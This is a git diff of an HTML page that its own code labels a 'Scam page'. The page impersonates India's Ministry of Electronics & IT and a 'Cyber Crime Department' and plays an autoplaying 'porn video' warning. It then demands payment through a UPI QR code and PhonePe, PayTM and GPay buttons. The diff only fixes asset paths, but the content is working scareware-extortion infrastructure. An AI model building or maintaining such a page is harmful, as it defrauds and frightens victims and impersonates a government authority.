--- a/index.html
+++ b/index.html
@@ -9,14 +9,14 @@
     <!-- warning (video) -->
     <div id="pornvideo">
         <video autoplay muted id="scanVideo">
-            <source src="/assests/video.mp4" type="video/mp4">
+            <source src="assests/video.mp4" type="video/mp4">
         </video>
     </div>
 
     <!-- Scam page (hidden initially) -->
     <div id="scamAlert" class="hidden">
         <div class="header">
-            <img src="/assests/govt_logo.png" alt="Cyber Crime Department">
+            <img src="assests/govt_logo.png" alt="Cyber Crime Department">
             <h1>MINISTRY OF ELECTRONICS & IT</h1>
         </div>
 
@@ -28,14 +28,14 @@
 
         
         <div class="qr-code">
-            <img src="/assests/qr.jpg" alt="UPI QR">
+            <img src="assests/qr.jpg" alt="UPI QR">
             <p>Scan to pay via UPI</p>
         </div>
 
         <div class="payment-buttons">
-  <button onclick="Payment('PhonePe')"><img src="/assests/PhonePe.png" alt="PhonePe" width="100"></button>
-  <button onclick="Payment('PayTM')"><img src="/assests/Paytm.png" alt="PayTM" width="100"></button>
-  <button onclick="Payment('GPay')"><img src="/assests/gpay.png" alt="GPay" width="100"></button>
+  <button onclick="Payment('PhonePe')"><img src="assests/PhonePe.png" alt="PhonePe" width="100"></button>
+  <button onclick="Payment('PayTM')"><img src="assests/Paytm.png" alt="PayTM" width="100"></button>
+  <button onclick="Payment('GPay')"><img src="assests/gpay.png" alt="GPay" width="100"></button>
 </div>
         
 
